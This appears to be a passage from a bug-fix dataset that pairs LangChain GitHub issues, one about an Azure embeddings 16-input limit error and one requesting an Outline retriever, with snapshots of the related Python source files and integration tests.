- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
db = Chroma.from_documents(docs, AzureOpenAIEmbeddings())
### Expected behavior
This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error
BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
| https://github.com/langchain-ai/langchain/issues/13539 | https://github.com/langchain-ai/langchain/pull/13425 | e53f59f01a2d5020e4a3248380d7a04891c8be1f | 6bf9b2cb51f94872bb251ba22fe7e3aefb753d43 | "2023-11-17T21:47:33Z" | python | "2023-11-20T02:34:51Z" | libs/langchain/langchain/embeddings/azure_openai.py | """Azure OpenAI embeddings wrapper."""
from __future__ import annotations
import os
import warnings
from typing import Dict, Optional, Union
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.pydantic_v1 import Field, root_validator
from langchain.utils import get_from_dict_or_env
from langchain.utils.openai import is_openai_v1
class AzureOpenAIEmbeddings(OpenAIEmbeddings):
"""`Azure OpenAI` Embeddings API."""
azure_endpoint: Union[str, None] = None
"""Your Azure endpoint, including the resource.
Automatically inferred from env var `AZURE_OPENAI_ENDPOINT` if not provided.
Example: `https://example-resource.azure.openai.com/`
"""
deployment: Optional[str] = Field(default=None, alias="azure_deployment")
"""A model deployment.
If given sets the base client URL to include `/deployments/{azure_deployment}`.
Note: this means you won't be able to use non-deployment endpoints.
"""
openai_api_key: Union[str, None] = Field(default=None, alias="api_key")
"""Automatically inferred from env var `AZURE_OPENAI_API_KEY` if not provided."""
azure_ad_token: Union[str, None] = None
"""Your Azure Active Directory token.
Automatically inferred from env var `AZURE_OPENAI_AD_TOKEN` if not provided.
For more:
https://www.microsoft.com/en-us/security/business/identity-access/microsoft-entra-id.
""" # noqa: E501
azure_ad_token_provider: Union[str, None] = None
"""A function that returns an Azure Active Directory token.
Will be invoked on every request.
"""
openai_api_version: Optional[str] = Field(default=None, alias="api_version")
"""Automatically inferred from env var `OPENAI_API_VERSION` if not provided."""
validate_base_url: bool = True
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
# Check OPENAI_KEY for backwards compatibility.
# TODO: Remove OPENAI_API_KEY support to avoid possible conflict when using
# other forms of azure credentials.
values["openai_api_key"] = (
values["openai_api_key"]
or os.getenv("AZURE_OPENAI_API_KEY")
or os.getenv("OPENAI_API_KEY")
)
values["openai_api_base"] = values["openai_api_base"] or os.getenv(
"OPENAI_API_BASE"
)
values["openai_api_version"] = values["openai_api_version"] or os.getenv(
"OPENAI_API_VERSION", default="2023-05-15"
)
values["openai_api_type"] = get_from_dict_or_env(
values, "openai_api_type", "OPENAI_API_TYPE", default="azure"
)
values["openai_organization"] = (
values["openai_organization"]
or os.getenv("OPENAI_ORG_ID")
or os.getenv("OPENAI_ORGANIZATION")
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
values["azure_endpoint"] = values["azure_endpoint"] or os.getenv(
"AZURE_OPENAI_ENDPOINT"
)
values["azure_ad_token"] = values["azure_ad_token"] or os.getenv(
"AZURE_OPENAI_AD_TOKEN"
)
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
if is_openai_v1():
# For backwards compatibility. Before openai v1, no distinction was made
# between azure_endpoint and base_url (openai_api_base).
openai_api_base = values["openai_api_base"]
if openai_api_base and values["validate_base_url"]:
if "/openai" not in openai_api_base:
values["openai_api_base"] += "/openai"
warnings.warn(
"As of openai>=1.0.0, Azure endpoints should be specified via "
f"the `azure_endpoint` param not `openai_api_base` "
f"(or alias `base_url`). Updating `openai_api_base` from "
f"{openai_api_base} to {values['openai_api_base']}."
)
if values["deployment"]:
warnings.warn(
"As of openai>=1.0.0, if `deployment` (or alias "
"`azure_deployment`) is specified then "
"`openai_api_base` (or alias `base_url`) should not be. "
"Instead use `deployment` (or alias `azure_deployment`) "
"and `azure_endpoint`."
)
if values["deployment"] not in values["openai_api_base"]:
warnings.warn(
"As of openai>=1.0.0, if `openai_api_base` "
"(or alias `base_url`) is specified it is expected to be "
"of the form "
"https://example-resource.azure.openai.com/openai/deployments/example-deployment. " # noqa: E501
f"Updating {openai_api_base} to "
f"{values['openai_api_base']}."
)
values["openai_api_base"] += (
"/deployments/" + values["deployment"]
)
values["deployment"] = None
client_params = {
"api_version": values["openai_api_version"],
"azure_endpoint": values["azure_endpoint"],
"azure_deployment": values["deployment"],
"api_key": values["openai_api_key"],
"azure_ad_token": values["azure_ad_token"],
"azure_ad_token_provider": values["azure_ad_token_provider"],
"organization": values["openai_organization"],
"base_url": values["openai_api_base"],
"timeout": values["request_timeout"],
"max_retries": values["max_retries"],
"default_headers": values["default_headers"],
"default_query": values["default_query"],
"http_client": values["http_client"],
}
values["client"] = openai.AzureOpenAI(**client_params).embeddings
values["async_client"] = openai.AsyncAzureOpenAI(**client_params).embeddings
else:
values["client"] = openai.Embedding
return values
@property
def _llm_type(self) -> str:
return "azure-openai-chat"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 13,539 | New update broke embeddings models | ### System Info
LangChain version: 0.0.337
Python version: 3.10.13
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
db = Chroma.from_documents(docs, AzureOpenAIEmbeddings())
### Expected behavior
This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error
BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
| https://github.com/langchain-ai/langchain/issues/13539 | https://github.com/langchain-ai/langchain/pull/13425 | e53f59f01a2d5020e4a3248380d7a04891c8be1f | 6bf9b2cb51f94872bb251ba22fe7e3aefb753d43 | "2023-11-17T21:47:33Z" | python | "2023-11-20T02:34:51Z" | libs/langchain/langchain/embeddings/openai.py | from __future__ import annotations
import logging
import os
import warnings
from importlib.metadata import version
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Union,
cast,
)
import numpy as np
from packaging.version import Version, parse
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable:
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict, skip_empty: bool = False) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
import openai
raise openai.error.APIError("OpenAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
if _is_openai_v1():
return embeddings.client.create(**kwargs)
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
if _is_openai_v1():
return await embeddings.async_client.create(**kwargs)
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return await _async_embed_with_retry(**kwargs)
def _is_openai_v1() -> bool:
_version = parse(version("openai"))
return _version >= Version("1.0.0")
class OpenAIEmbeddings(BaseModel, Embeddings):
"""OpenAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key or pass it
as a named parameter to the constructor.
Example:
.. code-block:: python
from langchain.embeddings import OpenAIEmbeddings
openai = OpenAIEmbeddings(openai_api_key="my-api-key")
In order to use the library with Microsoft Azure endpoints, you need to set
the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
the properties of your endpoint.
In addition, the deployment name must be passed as the model parameter.
Example:
.. code-block:: python
import os
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"
from langchain.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings(
deployment="your-embeddings-deployment-name",
model="your-embeddings-model-name",
openai_api_base="https://your-endpoint.openai.azure.com/",
openai_api_type="azure",
)
text = "This is a test query."
query_result = embeddings.embed_query(text)
"""
client: Any = Field(default=None, exclude=True) #: :meta private:
async_client: Any = Field(default=None, exclude=True) #: :meta private:
model: str = "text-embedding-ada-002"
# to support Azure OpenAI Service custom deployment names
deployment: Optional[str] = model
# TODO: Move to AzureOpenAIEmbeddings.
openai_api_version: Optional[str] = Field(default=None, alias="api_version")
"""Automatically inferred from env var `OPENAI_API_VERSION` if not provided."""
# to support Azure OpenAI Service custom endpoints
openai_api_base: Optional[str] = Field(default=None, alias="base_url")
"""Base URL path for API requests, leave blank if not using a proxy or service
emulator."""
# to support Azure OpenAI Service custom endpoints
openai_api_type: Optional[str] = None
# to support explicit proxy for OpenAI
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = Field(default=None, alias="api_key")
"""Automatically inferred from env var `OPENAI_API_KEY` if not provided."""
openai_organization: Optional[str] = Field(default=None, alias="organization")
"""Automatically inferred from env var `OPENAI_ORG_ID` if not provided."""
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 2
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float], Any]] = Field(
default=None, alias="timeout"
)
"""Timeout for requests to OpenAI completion API. Can be float, httpx.Timeout or
None."""
headers: Any = None
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
skip_empty: bool = False
"""Whether to skip empty strings when embedding or raise an error.
Defaults to not skipping."""
default_headers: Union[Mapping[str, str], None] = None
default_query: Union[Mapping[str, object], None] = None
# Configure a custom httpx client. See the
# [httpx documentation](https://www.python-httpx.org/api/#client) for more details.
http_client: Union[Any, None] = None
"""Optional httpx.Client."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
allow_population_by_field_name = True
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = values["openai_api_base"] or os.getenv(
"OPENAI_API_BASE"
)
values["openai_api_type"] = get_from_dict_or_env(
values,
"openai_api_type",
"OPENAI_API_TYPE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
default_api_version = "2023-05-15"
# Azure OpenAI embedding models allow a maximum of 16 texts
# at a time in each batch
# See: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference#embeddings
values["chunk_size"] = max(values["chunk_size"], 16)
else:
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
# Check OPENAI_ORGANIZATION for backwards compatibility.
values["openai_organization"] = (
values["openai_organization"]
or os.getenv("OPENAI_ORG_ID")
or os.getenv("OPENAI_ORGANIZATION")
)
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
else:
if _is_openai_v1():
if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
warnings.warn(
"If you have openai>=1.0.0 installed and are using Azure, "
"please use the `AzureOpenAIEmbeddings` class."
)
client_params = {
"api_key": values["openai_api_key"],
"organization": values["openai_organization"],
"base_url": values["openai_api_base"],
"timeout": values["request_timeout"],
"max_retries": values["max_retries"],
"default_headers": values["default_headers"],
"default_query": values["default_query"],
"http_client": values["http_client"],
}
if not values.get("client"):
values["client"] = openai.OpenAI(**client_params).embeddings
if not values.get("async_client"):
values["async_client"] = openai.AsyncOpenAI(
**client_params
).embeddings
elif not values.get("client"):
values["client"] = openai.Embedding
else:
pass
return values
@property
def _invocation_params(self) -> Dict[str, Any]:
if _is_openai_v1():
openai_args: Dict = {"model": self.model, **self.model_kwargs}
else:
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_api_type in ("azure", "azure_ad", "azuread"):
openai_args["engine"] = self.deployment
# TODO: Look into proxy with openai v1.
if self.openai_proxy:
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
} # type: ignore[assignment] # noqa: E501
return openai_args
# please refer to
# https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
def _get_len_safe_embeddings(
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
if self.show_progress_bar:
try:
from tqdm.auto import tqdm
_iter = tqdm(range(0, len(tokens), _chunk_size))
except ImportError:
_iter = range(0, len(tokens), _chunk_size)
else:
_iter = range(0, len(tokens), _chunk_size)
for i in _iter:
response = embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
if not isinstance(response, dict):
response = response.dict()
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
if self.skip_empty and len(batched_embeddings[i]) == 1:
continue
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average_embedded = embed_with_retry(
self,
input="",
**self._invocation_params,
)
if not isinstance(average_embedded, dict):
average_embedded = average_embedded.dict()
average = average_embedded["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
# please refer to
# https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
async def _aget_len_safe_embeddings(
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
for i in range(0, len(tokens), _chunk_size):
response = await async_embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
if not isinstance(response, dict):
response = response.dict()
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average_embedded = embed_with_retry(
self,
input="",
**self._invocation_params,
)
if not isinstance(average_embedded, dict):
average_embedded = average_embedded.dict()
average = average_embedded["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# NOTE: to keep things simple, we assume the list may contain texts longer
# than the maximum context and use length-safe embedding function.
engine = cast(str, self.deployment)
return self._get_len_safe_embeddings(texts, engine=engine)
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# NOTE: to keep things simple, we assume the list may contain texts longer
# than the maximum context and use length-safe embedding function.
engine = cast(str, self.deployment)
return await self._aget_len_safe_embeddings(texts, engine=engine)
def embed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
return self.embed_documents([text])[0]
async def aembed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embeddings = await self.aembed_documents([text])
return embeddings[0]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 13,539 | New update broke embeddings models | ### System Info
LangChain version: 0.0.337
Python version: 3.10.13
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
db = Chroma.from_documents(docs, AzureOpenAIEmbeddings())
### Expected behavior
This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error
BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
| https://github.com/langchain-ai/langchain/issues/13539 | https://github.com/langchain-ai/langchain/pull/13425 | e53f59f01a2d5020e4a3248380d7a04891c8be1f | 6bf9b2cb51f94872bb251ba22fe7e3aefb753d43 | "2023-11-17T21:47:33Z" | python | "2023-11-20T02:34:51Z" | libs/langchain/tests/integration_tests/embeddings/test_azure_openai.py | """Test openai embeddings."""
import os
from typing import Any
import numpy as np
import pytest
from langchain.embeddings import AzureOpenAIEmbeddings
def _get_embeddings(**kwargs: Any) -> AzureOpenAIEmbeddings:
return AzureOpenAIEmbeddings(
openai_api_version=os.environ.get("AZURE_OPENAI_API_VERSION", ""),
**kwargs,
)
def test_azure_openai_embedding_documents() -> None:
"""Test openai embeddings."""
documents = ["foo bar"]
embedding = _get_embeddings()
output = embedding.embed_documents(documents)
assert len(output) == 1
assert len(output[0]) == 1536
def test_azure_openai_embedding_documents_multiple() -> None:
"""Test openai embeddings."""
documents = ["foo bar", "bar foo", "foo"]
embedding = _get_embeddings(chunk_size=2)
embedding.embedding_ctx_length = 8191
output = embedding.embed_documents(documents)
assert len(output) == 3
assert len(output[0]) == 1536
assert len(output[1]) == 1536
assert len(output[2]) == 1536
@pytest.mark.asyncio
async def test_azure_openai_embedding_documents_async_multiple() -> None:
"""Test openai embeddings."""
documents = ["foo bar", "bar foo", "foo"]
embedding = _get_embeddings(chunk_size=2)
embedding.embedding_ctx_length = 8191
output = await embedding.aembed_documents(documents)
assert len(output) == 3
assert len(output[0]) == 1536
assert len(output[1]) == 1536
assert len(output[2]) == 1536
def test_azure_openai_embedding_query() -> None:
"""Test openai embeddings."""
document = "foo bar"
embedding = _get_embeddings()
output = embedding.embed_query(document)
assert len(output) == 1536
@pytest.mark.asyncio
async def test_azure_openai_embedding_async_query() -> None:
"""Test openai embeddings."""
document = "foo bar"
embedding = _get_embeddings()
output = await embedding.aembed_query(document)
assert len(output) == 1536
@pytest.mark.skip(reason="Unblock scheduled testing. TODO: fix.")
def test_azure_openai_embedding_with_empty_string() -> None:
"""Test openai embeddings with empty string."""
import openai
document = ["", "abc"]
embedding = _get_embeddings()
output = embedding.embed_documents(document)
assert len(output) == 2
assert len(output[0]) == 1536
expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[
"data"
][0]["embedding"]
assert np.allclose(output[0], expected_output)
assert len(output[1]) == 1536
def test_embed_documents_normalized() -> None:
output = _get_embeddings().embed_documents(["foo walked to the market"])
assert np.isclose(np.linalg.norm(output[0]), 1.0)
def test_embed_query_normalized() -> None:
output = _get_embeddings().embed_query("foo walked to the market")
assert np.isclose(np.linalg.norm(output), 1.0)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,814 | Create retriever for Outline to ask questions on knowledge base | ### Feature request
A retriever for documents from [Outline](https://github.com/outline/outline).
The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post
The implementation will be similar to the Wikipedia retriever:
https://python.langchain.com/docs/integrations/retrievers/wikipedia
### Motivation
Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.
### Your contribution
PR will be coming soon. | https://github.com/langchain-ai/langchain/issues/11814 | https://github.com/langchain-ai/langchain/pull/13889 | f2af82058f4904b20ae95c6d17d2b65666bf882a | 935f78c9449c40473541666a8b0a0dc61873b0eb | "2023-10-15T01:58:24Z" | python | "2023-11-27T02:56:12Z" | docs/docs/integrations/retrievers/outline.ipynb | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,814 | Create retriever for Outline to ask questions on knowledge base | ### Feature request
A retriever for documents from [Outline](https://github.com/outline/outline).
The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post
The implementation will be similar to the Wikipedia retriever:
https://python.langchain.com/docs/integrations/retrievers/wikipedia
### Motivation
Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.
### Your contribution
PR will be coming soon. | https://github.com/langchain-ai/langchain/issues/11814 | https://github.com/langchain-ai/langchain/pull/13889 | f2af82058f4904b20ae95c6d17d2b65666bf882a | 935f78c9449c40473541666a8b0a0dc61873b0eb | "2023-10-15T01:58:24Z" | python | "2023-11-27T02:56:12Z" | libs/langchain/langchain/retrievers/__init__.py | """**Retriever** class returns Documents given a text **query**.
It is more general than a vector store. A retriever does not need to be able to
store documents, only to return (or retrieve) it. Vector stores can be used as
the backbone of a retriever, but there are other types of retrievers as well.
**Class hierarchy:**
.. code-block::
BaseRetriever --> <name>Retriever # Examples: ArxivRetriever, MergerRetriever
**Main helpers:**
.. code-block::
Document, Serializable, Callbacks,
CallbackManagerForRetrieverRun, AsyncCallbackManagerForRetrieverRun
"""
from langchain.retrievers.arcee import ArceeRetriever
from langchain.retrievers.arxiv import ArxivRetriever
from langchain.retrievers.azure_cognitive_search import AzureCognitiveSearchRetriever
from langchain.retrievers.bm25 import BM25Retriever
from langchain.retrievers.chaindesk import ChaindeskRetriever
from langchain.retrievers.chatgpt_plugin_retriever import ChatGPTPluginRetriever
from langchain.retrievers.cohere_rag_retriever import CohereRagRetriever
from langchain.retrievers.contextual_compression import ContextualCompressionRetriever
from langchain.retrievers.docarray import DocArrayRetriever
from langchain.retrievers.elastic_search_bm25 import ElasticSearchBM25Retriever
from langchain.retrievers.embedchain import EmbedchainRetriever
from langchain.retrievers.ensemble import EnsembleRetriever
from langchain.retrievers.google_cloud_documentai_warehouse import (
GoogleDocumentAIWarehouseRetriever,
)
from langchain.retrievers.google_vertex_ai_search import (
GoogleCloudEnterpriseSearchRetriever,
GoogleVertexAIMultiTurnSearchRetriever,
GoogleVertexAISearchRetriever,
)
from langchain.retrievers.kay import KayAiRetriever
from langchain.retrievers.kendra import AmazonKendraRetriever
from langchain.retrievers.knn import KNNRetriever
from langchain.retrievers.llama_index import (
LlamaIndexGraphRetriever,
LlamaIndexRetriever,
)
from langchain.retrievers.merger_retriever import MergerRetriever
from langchain.retrievers.metal import MetalRetriever
from langchain.retrievers.milvus import MilvusRetriever
from langchain.retrievers.multi_query import MultiQueryRetriever
from langchain.retrievers.multi_vector import MultiVectorRetriever
